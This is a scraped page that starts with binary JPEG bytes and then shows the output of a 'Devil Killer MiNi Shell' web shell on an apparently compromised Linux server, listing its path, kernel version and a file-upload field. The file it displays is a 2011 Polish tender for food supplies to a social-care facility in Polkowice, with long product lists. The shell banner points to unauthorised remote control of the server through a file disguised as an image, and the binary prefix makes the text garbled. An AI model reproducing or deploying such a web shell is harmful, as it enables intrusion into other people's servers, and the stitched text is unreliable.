JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111123/393358-N-2011.html

<p class="kh_header"><b>Polkowice: Dostawa żywności dla potrzeb zbiorowego żywienia osób przebywających w Placówce Socjalizacyjnej Skarbek w Polkowicach</b><br>
<b>Numer ogłoszenia: 393358 - 2011; data zamieszczenia: 23.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Placówka Socjalizacyjna "SKARBEK" , ul. Browarna 1, 59-100 Polkowice, woj. dolnośląskie, tel. 076 7239664 (61, 62, 63), faks 076 7239664.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności dla potrzeb zbiorowego żywienia osób przebywających w Placówce Socjalizacyjnej Skarbek w Polkowicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności dla potrzeb zbiorowego żywienia osób przebywających w Placówce socjalizacyjnej Skarbek w Polkowicach
Zamówienie obejmuje:
- część I - artykuły spożywcze - CPV:15800000-6
- część II - mięso i wędliny - CPV: 15100000-9
- część III - produkty mleczarskie - CPV: 15500000-3
- część IV - owoce i warzywa - CPV: 15300000-1
- część V - pieczywo - CPV: 15810000-9

Zarówno przedmiot jak i zakres zamówienia określony jest w Specyfikacji Istotnych Warunków Zamówienia w postaci Formularza Cenowego (załącznik nr 2 do SIWZ), który określa potrzeby asortymentowo - ilościowe Zamawiającego na okres od 02.01.2012 r do 31.12.2012 r.
Zamawiający nie jest zobowiązany do zamówienia podanych w załączniku ilości. 
Ilość ta będzie wynikać z rzeczywistych potrzeb Zamawiającego w okresie obowiązywania umowy. 
Dostawy przedmiotu zamówienia w poszczególnych okresach czasu muszą być realizowane wg. odrębnych zamówień dokonywanych przez Zamawiającego telefonicznie lub fax-em na jeden dzień roboczy przed planowaną dostawą.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3, 15.30.00.00-1, 15.81.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunków będzie dokonywana według kryterium spełnia - nie  spełnia. Niespełnienie chociaż jednego z wymaganych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania wymaganych warunków będzie dokonywana według kryterium spełnia - nie  spełnia. Niespełnienie chociaż jednego z wymaganych warunków skutkować będzie wykluczeniem Wykonawcy z postępowania</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy (wg załączonego wzoru nr 1 ),
2) decyzja wystawiona dla Wykonawcy przez właściwy organ Państwowej Inspekcji Weterynaryjnej (w przypadku producenta produktów pochodzenia zwierzęcego pozostającego pod nadzorem PIW) lub Państwowej Inspekcji Sanitarnej (gdy podmiot nie będący producentem pozostaje pod nadzorem PIS) o spełnieniu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub w obrocie artykułami żywnościowymi oraz do zapewnienia właściwej jakości zdrowotnej tych artykułów;
3) dokument wystawiony dla Wykonawcy przez właściwy organ Państwowej Inspekcji Weterynaryjnej (w przypadku producenta produktów pochodzenia zwierzęcego pozostającego pod nadzorem PIW) lub Państwowej Inspekcji Sanitarnej (gdy podmiot nie będący producentem pozostaje pod nadzorem PIS) stwierdzający, że w procesie produkcji lub obrocie artykułami żywnościowymi jest stosowany system HACCP (dokument ten winien być wystawiony nie wcześniej niż 1 rok przed upływem terminu składania ofert); - dotyczy zakładów produkujących lub wprowadzających żywność do obrotu, które zgodnie z obowiązującymi przepisami podlegają takiemu obowiązkowi; jeżeli z tytułu prowadzonej działalności wykonawca nie podlega obowiązkowi wdrożenia i stosowania systemu HACCP przedstawi on stosowny dokument wystawiony dla producentów;
4) pełnomocnictwo podmiotów występujących wspólnie (jeżeli dotyczy),
5) pełnomocnictwo dla osoby/osób podpisującej ofertę i oświadczenia (jeśli uprawnienie tych osób nie wynika z innych dokumentów dołączonych do oferty),
6) zaparafowany projekt umowy,</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana umowy - w przypadku utawowej stawki podatku VAT</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.psskarbek.za.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Placówka Socjalizacyjna Skarbek
ul. Browarna 1
59-100 Polkowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.12.2011 godzina 09:00, miejsce: Placówka Socjalizacyjna Skarbek ul. Browarna 1 59-100 Polkowice.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> artykuły spożywcze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa artykułu zamawianego	Nazwa producenta oferowanego przez dostawcę	Wielkość 12   miesięcznego zamówienia:
1	Budyń z cukrem typu Winiary lub równoważny różne smaki 60 g  350 szt,
2	Fasola biała puszka 425 g		50 szt,			
3	Galaretka owocowa w proszku typu Winiary lub równoważna różne smaki 79 g	500 szt,				
4	Koncentrat pomidorowy typu Pudliszki lub równoważny 30%200g		200 szt,			
5	Konserwa mięsna 300 g tyrolska 100 szt,			
6	Konserwa mięsna 300 g gulasz angielski 100 szt,		
7	Wafle familijne typu Jutrzenka lub równoważne  180 g 60 szt
8	Sok owocowy typu Kubuś lub równoważny 0,4 l	 500 szt		
9	Ciastka markizy typu Pieguski lub równoważne 165 g	60 szt	
10	Paluszki 70 g		500 szt				
11	Sos boloński typu Winiar lub równoważny 46 g		60 szt	
12	Sos pieczeniowy ciemny typu Winiar lub równoważny 30 g		100 szt				
13	Sos myśliwski typu Winiar lub równoważny  34 g		60 szt,	
14	Sos pieczarkowy typu Winiar lub równoważny 20 g	50 szt,	
15	Chrupki kuleczki owocowe 80g		250 szt		
16	Cukier kryształ 1 kg		550 kg			
17	Spody do tortów 3-warstwowe jasne typu Delecta lub 
równoważne 420 g		20 szt				
18	Herbatniki pod sernik typu Miś 
lub równoważne 100g 		100 szt				
19	Jaja - klasa wagowa L 		4000 szt			
20	Makaron nitki  500 g		50 szt			
21	Makaron świderki 500 g		 100szt			
22	Makaron spagetti 500 g		80 szt			
23	Makaron łazanka 500 g		60 szt			
24	Makaron kolanka duże500 g		50 szt		
25	Makaron kolanka małe 500 g		50 szt			
26	Makaron muszelka duża 500 g		50 szt		
27	Makaron muszelka mała 500 g		50 szt		
28	Makaron zacierka 250 g		40 szt			
29	Margaryna do kanapek 500 g		800 szt,			
30	Margaryna mleczna 250 g w kostce		500 szt,		
31	Mąka tortowa 1 kg		500 kg,				
32	Mąka ziemniaczana 500 g		30 szt,			
33	Paprykarz szczeciński 180 g		150 szt,			
34	Sałatka rybna neptun typu Dega lub równoważna 135 g	100 szt,	
35	Pasztet prochowicki 160 g		350 szt,			
36	Płatki kukurydziane typu Nestle lub równoważne- 250 g.	200 szt,	
37	Płatki kukurydziane z miodem typu Nestle lub równoważne 250 g		150 szt				
38	Płatki zbożowe czekoladowe typu Nestle lub równoważne 250 g		150 szt				
39	Herbata owocowa ekspresowa typu Saga lub równoważna
(25 torebek)	60 szt				
40	Herbata granulowana owocowa Ekoland lub równoważna 300 g		200 szt				
41	Herbata expresowa zwykła typu Golden lub równoważna
(100 torebek)  70 szt				
42	Kisiel z cukrem różne smaki typu Winiar lub równoważny 80 g		400 szt				
43	Musztarda stołowa typu Pegaz lub równoważna 200 g	150 szt,	
44	Olej  rzepakowy 1l- z pierwszego tłoczenia	300 szt,		
45	Powidła śliwkowe typu Łowicz lub równoważne 350 g	80 szt,	
46	Płatki owsiane górskie błyskawiczne 500 g		30 szt,	
47	Płatki jęczmienne błyskawiczne 400 g		30 szt,		
48	Zupa żurek typu Winiar lub równoważna  49 g  torebka	130 szt,	
49	Zupa barszcz biały typu Winiar lub równoważna 66 g torebka 130 szt,
50	Zupa fasolowa typu Winiar lub równoważna 65 g	90 szt,	
51	Chrupki kukurydziane 70 g		120 szt,			
52	Chrupki flips 70 g- różne smaki	240 szt,			
53	Cukierki owocowe nadziewane 1 kg		40 kg,		
54	Drops owocowy 5 smaków 47 g		100 szt,		
55	Wafelki czekoladowe typu Grześki lub równoważne 39 g	250 szt,	
56	Szczaw siekany 300 ml		50 szt,			
57	Zupa instant błyskawiczna 69 g		300 szt,		
58	Sałatka obiadowa 0,9 l .		40 szt,			
59	Dżem owocowy niskosłodzony typu Łowicz lub równoważny różne smaki 330g   200 szt,				
60	Miód wielokwiatowy 250 g	20 szt,				
61	Kakao granulowane słodkie typu Puchatek lub równoważne 300 g	160 szt,				
62	Kakao naturalne 100 g	20 szt,				
63	Kawa inka  kartonik 150 g	35 szt,				
64	Kasza manna błyskawiczna 500 g	45 szt,			
65	Kasza jęczmienna gruba 500 g	70 szt,			
66	Kasza gryczana  500 g		50 szt,			
67	Ryż biały długoziarnisty1 kg		150 kg,			
68	Płatki ryżowe błyskawiczne  250 g	50 szt,			
69	Patisony konserwowe 0,9 l		15 szt,			
70	Bulion drobiowy w kostkach typu Winiar lub równoważne 
(12 kostek)		50 szt,				
71	Syrop owocowy różne smaki  490 ml		200 szt,		
72	Zaprawa cytrynowa 500 g		50 szt,			
73	Bułka tarta 500 g		70 szt,				
74	Filet z morszczuka płaty 1 kg SHP	50 kg,			
75	Groszek konserwowy 400 g		70 szt,			
76	Kukurydza konserwowa 370 g	100 szt,			
77	Mieszanka 3 skł. 0,5 l typu Pudliszki lub równoważna 	50 szt,	
78	Ketchup łagodny typu Tortex lub równoważny 500 g	170 szt,	
79	Przyprawa Maggi Winiary lub równoważna 1 l		20 szt,	
80	Przyprawa typu Kucharek lub równoważna 1 kg		40 kg,	
81	Majonez typu Winiary 250 ml lub równoważny		50 szt,	
82	Majonez typu Winiary 400 ml lub równoważny		50 szt,	
83	Majonez typu Winiary 700 ml lub równoważny 		30 szt,	
84	Krem chrzanowy 200 ml		10 szt,			
85	Groch łuskany połówki  500 g		30 szt,		
86	Fasola biała Jaś 400g		70 szt,			
87	Rogal z czekoladą typu Croissant lub równoważny 60 g	500 szt,	
88	Cukier puder 500 g		20 szt,				
89	Cukier waniliowy 16 g		150 szt,			
90	Proszek do pieczenia 18 g		60 szt,			
91	Kwasek cytrynowy 20 g		50 szt,			
92	Pieprz czarny mielony 20 g		100 szt,			
93	Pieprz ziołowy mielony 20 g		30 szt,			
94	Przyprawa tzatziki 20 g		30 szt,			
95	Czosnek granulowany 20 g		100 szt,			
96	Papryka słodka 15 g		30 szt,			
97	Papryka ostra 15 g		30 szt,				
98	Przyprawa do grilla 20 g		50 szt,			
99	Przyprawa do kurczaka 20 g		50 szt,			
100	Przyprawa do ryb 20g		30 szt,			
101	Majeranek 10 g		20 szt,				
102	Sól jodowana 1 kg		60 kg,				
103	Bazylia		12 szt,				
104	Oregano		12 szt,				
105	Wiórki kokosowe 100 g		30 szt,			
106	Rodzynka 100 g		10 szt,				
107	Goździki suszone 100 g		5 szt,			
108	Soda oczyszczona 70 g		10 szt,			
109	Ryba matjas solony 		10 kg,			
110	Ryba mintaj płaty  SHP		50 kg,			
111	Paluszki rybne panierowane 1 kg		20 kg,		
112	Konserwa rybna-filet woleju 
180 g 		60 szt,				
113	Konserwa rybna-filet w pomidorach 180 g		60 szt,	
114	Ogórek konserwowy 0,9 l		150 szt,			
115	Krem czekoladowy do smarowania pieczywa typu Nutella lub równoważny 200 g		100 szt,				
116	Koncentrat barszczu ( butelka 330 ml )		10 szt,	
117	Zupa barszcz czerwony w torebce typu Winiar lub równoważny		10 szt,				
118	Ananas w puszce 450 g bez zalewy		10 szt,		
119	Brzoskwinia w puszce 450 g bez zalewy		20 szt,	
120	Wafle domowe-andrut suchy 		30 szt,		
121	Draże owocowe 70 g		50 szt,			
122	Czekolada mleczna 100 g		50 szt,			
123	Czekolada mleczna nadziewana 
100 g		50 szt,				
124	Ciastka  typu Delicje paczkowane lub równoważne 150 g		50 szt	
125	Sok owocowy w kartonie typu Hortex (różne smaki) lub równoważny 1 l		50 szt,				
126	Sok multiwitamina w kartonie 
typu Hortex lub równoważny 1 l		50 szt,				
127	Kompot owocowy( różne smaki) 0,9 l		100 szt,				
128	Bita śmietana w proszku 60 g		10 szt,				
129	Cynamon mielony  20 g		10 szt,				
130	Woda mineralna niegazowana
1,5 l typu Primawera lub równoważna		300 szt,				
131	Woda mineralna niegazowana
 0,5 l typu Primawera lub równoważna		100 szt,				
132	Wafelek orzechowy typu Princessa lub równoważny 37 g		70 szt,				
133	Lody różne smaki  200 ml		200 szt,				
134	Posypka owocowa 50 g		10 szt,				
135	Mleko w proszku 500 g		10 szt,				
136	Krem do ciast czekoladowy typu Delecta lub równoważny 100 g,		20 szt				
137	Krem do ciast waniliowy typu Maspex lub równoważny 120 g,		20 szt,				
138	Ser topiony kostka śmietankowy typu Lactima 
lub równoważny 100 g		120 szt,				
139	Kapusta czerwona-sałatka 890 g		40 szt,				
140	Papryka konserwowa 820 g		25 szt,				
141	Popcorn 100 g		50 szt,				
142	Ćwikła z chrzanem 300g		5 szt,				
143	Chrzan 160 g		15 szt,				
144	Lizak kulisty 8 g		100 szt,				
145	Kleik ryżowy błysk. 170 g		5 szt,				
146	Masło exstra 250 g		10 szt,				
147	Drożdże piek.0,1 kg		2 kg,				
148	Kisiel błyskawiczny typu Emix lub równoważny różne smaki 		60 szt,				
149	Budyń błyskawiczny typu Emix lub równoważny różne smaki  		60 szt,				
150	Baranek czekoladowy 50 g		6 szt,				
151	Babeczka wielkanocna		10 szt,				
152	Mikołaj czekoladowy 60 g		30 szt,				
153	Cukierki zozole 75 g		60 szt,				
154	Baton nadziewany Pawełek lub równoważny 35 g		100 szt,				
155 	Polewa czekoladowa 100 g		10 szt,				
156	Liść laurowy 6 g		15 szt,				
157	Ziele angielskie 5 g		15 szt,				
158	Przyprawa gyros 30 g		20 szt,				
159	Ciastka pierniki czekolad. 150g 		30 szt,				
160	Zupa borowikowa typu Winiar lub równoważna 66 g torebka		40 szt,				
161	Zupa grzybowa typu Winiar lub równoważna 66 g torebka		40 szt,				
162	Makaron wstążki 500 g		6 szt,				
163	Masa makowa z bakaliami puszka		4 szt,				
164	Herbata melisa owocowa ekspressowa ( 20 torebek )		20 szt
Zamawiający nie jest zobowiązany do zamówienia podanych w załączniku ilości. 
Ilość ta będzie wynikać z rzeczywistych potrzeb Zamawiającego w okresie obowiązywania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> mięso i wędliny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wędliny					
1	Kiełbasa śląska wieprzowa	150 kg				
2	Szynka tyrolska wieprzowa	10 kg				
3	Szynka konserwowa	40 kg				
4	Szynka wieprzowa	10 kg				
5	Mortadela wieprzowa	30 kg				
6	Ogonówka wieprzowa	30 kg				
7	Parówka cienka wieprzowa	60 kg				
8	Kiełbasa podsuszana drobiowa	30 kg				
9	Kiełbasa żywiecka wieprzowa	25 kg				
10	Polędwica królewska	15 kg				
11	Szynka sopocka	25 kg				
12	Polędwica drobiowa	20 kg				
13	Pasztet drobiowy	30 kg				
14	Pasztet wieprzowy	30 kg				
15	Szynka złocista	15 kg				
16	Mielonka wieprzowa	70 kg				
17	Kiełbasa podwawelska wieprz.	30 kg				
18	Kiełbasa zwyczajna	100 kg				
19	Filecik opiekany	40 kg				
